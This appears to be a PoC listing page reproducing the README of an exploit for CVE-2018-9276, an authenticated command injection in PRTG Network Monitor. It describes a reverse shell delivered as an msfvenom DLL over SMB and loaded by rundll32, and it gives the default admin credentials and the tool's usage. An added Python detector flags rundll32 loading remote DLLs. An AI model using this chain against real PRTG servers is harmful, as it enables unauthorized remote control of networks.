PoC details: 4e36758d1da65a1eb442e1b9099c2ef31809f4e3

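Related vulnerability
Title: Paessler PRTG Network Monitor OS command injection vulnerability (CVE-2018-9276)
Description: Paessler PRTG Network Monitor is network monitoring software from the German company Paessler. It provides usage monitoring, packet sniffing, in-depth analysis and concise reporting. Versions of Paessler PRTG Network Monitor before 18.2.39 contain an OS command injection vulnerability. An attacker can exploit it to execute arbitrary commands by sending malformed parameters.
Description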
CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
Introduction
# CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276

Improved version of an exploit written by https://github.com/M4LV0. I used the POST data from their script but just made it more reliable as I didn't have much success with it.

Payload delivery is essentially smb_delivery.  Impacket serves up a .dll generated by msfvenom, rundll32.exe does all the work.

Tested on Windows Server 2016 against PRTG 18.1.37.

## Dependencies

By no means is this well written and it's cobbled together from stackoverflow.  This was developed for use with Kali Linux and assumes the following is available:
* Impacket
* Netcat
* Msfvenom

## Assumptions
This is a point and shoot exploit, all you need to know are the admin credentials for the PRTG instance (default prtgadmin:prtgadmin). Depending on the configuration of the target machine, your mileage may vary. The following assumptions have been made:
* Target machine is Windows;
* Defender / AppLocker is not running; and
* Outbound SMB access is permitted
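
For defenders, the delivery path described above (rundll32.exe loading a DLL from an SMB share) is visible in process-creation telemetry. The following is an added example, not part of the original README or the exploit: it flags rundll32.exe command lines that reference a DLL on a UNC path. The event field names, the allowlisted file server and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # Windows path rules, works on any OS

# rundll32 argument that names a DLL on a UNC path: \\host\share\...\x.dll
# (limitation: paths containing spaces are not matched)
UNC_DLL = re.compile(r'\\\\([^\\\s"]+)\\[^\s",]+\.dll', re.IGNORECASE)

# Assumption: SMB hosts from which DLL loads are expected in this environment.
ALLOWED_SMB_HOSTS = {"fileserver01.corp.example"}

# Constructed process-creation events (not captured from a real system).
SAMPLE_EVENTS = [
    {"host": "MON01", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe \\192.0.2.10\SHARE\a.dll,0"},
    {"host": "MON01", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"host": "WS07", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe "\\fileserver01.corp.example\apps\tool.dll",Entry'},
    {"host": "WS07", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe \\192.0.2.10\SHARE\a.dll"},
]

def find_remote_dll_loads(events):
    """Return events where rundll32.exe is started with a DLL on a UNC path
    whose SMB host is not in ALLOWED_SMB_HOSTS."""
    hits = []
    for ev in events:
        # Only rundll32.exe is of interest; match on the image file name.
        if basename(ev["image"]).lower() != "rundll32.exe":
            continue
        m = UNC_DLL.search(ev["command_line"])
        if m and m.group(1).lower() not in ALLOWED_SMB_HOSTS:
            hits.append({**ev, "smb_host": m.group(1)})
    return hits

if __name__ == "__main__":
    for hit in find_remote_dll_loads(SAMPLE_EVENTS):
        print(f'{hit["host"]}: rundll32 loading DLL from {hit["smb_host"]}: '
              f'{hit["command_line"]}')
```

Blocking outbound SMB at the perimeter and enforcing AppLocker or Defender on the monitoring server remove two of the assumptions listed above.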

## Installation


```bash
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
```

## Usage
Figure out the credentials and drop shells :)
```text
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]

optional arguments:
  -h, --help            show this help message and exit
  -i HOST, --host HOST  IP address / Hostname of vulnerable PRTG server
  -p PORT, --port PORT  Port number
  --lhost LHOST         LHOST for MSFVENOM
  --lport LPORT         LPORT for MSFVENOM
  --user USER           Administrator Username
  --password PASSWORD   Administrator Password
  --https               Negotiate SSL connection to the server (Requires
                        socket to be compiled with SSL support)

```
## Disclaimer

This won't let you hack the Gibson.  Do not use this against ANY systems for which you are unauthorised.  I wrote this for fun.  Educational purposes only etc etc.
File snapshot

```
[4.0K] /data/pocs/4e36758d1da65a1eb442e1b9099c2ef31809f4e3
├── [ 15K] CVE-2018-9276.py
└── [2.1K] README.md

0 directories, 2 files
```